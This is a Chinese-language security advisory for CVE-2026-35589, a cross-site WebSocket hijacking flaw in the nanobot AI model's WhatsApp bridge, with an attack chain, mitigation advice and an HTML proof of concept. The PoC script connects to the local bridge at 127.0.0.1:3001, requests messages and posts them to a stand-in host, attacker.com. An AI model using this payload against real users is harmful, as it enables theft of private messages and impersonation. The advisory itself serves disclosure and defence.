CVE-2026-35589 CVSS 8.0 高危

CVE-2026-35589 nanobot跨站WebSocket劫持漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35589

漏洞类型

跨站WebSocket劫持

CVSS评分

8.0 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

nanobot

漏洞概述

nanobot是一个个人AI助手。在0.1.5版本之前，其bridge模块的WebSocket服务器存在跨站WebSocket劫持漏洞。该漏洞源于对CVE-2026-2577的不完整修复，尽管服务器已绑定至127.0.0.1并添加了可选的BRIDGE_TOKEN参数，但默认未启用令牌认证，且在WebSocket握手期间未验证Origin头。这导致攻击者可通过恶意网站建立WebSocket连接，劫持WhatsApp会话并读取消息。

技术细节

该漏洞的核心在于WebSocket握手阶段缺乏Origin头验证。浏览器对WebSocket连接不强制执行同源策略，这意味着如果服务器不拒绝跨域请求，任何网页都可以向本地服务发起连接。受影响的nanobot版本虽然将服务绑定至127.0.0.1，但这只能防止来自外网的直接攻击，无法防御受害浏览器内的恶意脚本。此外，修复方案中引入的BRIDGE_TOKEN默认未启用，导致连接完全无保护。攻击者可诱导用户访问恶意网页，利用JavaScript建立到ws://127.0.0.1:3001的连接。由于没有认证和跨域检查，服务器接受连接后，攻击者即可通过API读取WhatsApp消息、窃取二维码或冒充用户发送消息。

攻击链分析

STEP 1

1. 诱导访问

攻击者诱导正在运行nanobot bridge的用户访问包含恶意JavaScript代码的网站。

STEP 2

2. 发起连接

恶意网页尝试通过WebSocket协议连接到本地服务地址ws://127.0.0.1:3001。

STEP 3

3. 握手成功

由于服务端未验证Origin头且默认未开启Token认证，浏览器成功建立WebSocket连接。

STEP 4

4. 执行操作

攻击者利用建立的通道发送API指令，读取WhatsApp消息、获取二维码或发送欺诈信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CSWSH on nanobot -->
<!-- Victim visits this page while nanobot bridge is running -->
<!DOCTYPE html>
<html>
<body>
<script>
    // Attempt to connect to the local WebSocket server
    var ws = new WebSocket("ws://127.0.0.1:3001/");

    ws.onopen = function() {
        console.log("WebSocket connection established");
        // Example payload to read messages or interact with API
        // Specific payload depends on the nanobot bridge API protocol
        ws.send(JSON.stringify({ action: "get_messages" }));
    };

    ws.onmessage = function(event) {
        console.log("Received data:", event.data);
        // Exfiltrate data to attacker's server
        fetch("https://attacker.com/exfil", {
            method: "POST",
            body: event.data
        });
    };

    ws.onerror = function(error) {
        console.log("WebSocket Error:", error);
    };
</script>
</body>
</html>

影响范围

nanobot < 0.1.5

防御指南

临时缓解措施

建议用户立即停止在未打补丁的环境下运行nanobot bridge，或者确保在运行bridge时不浏览不可信的网页。作为临时缓解手段，用户应手动设置BRIDGE_TOKEN环境变量以激活认证功能，从而防止未授权的WebSocket连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表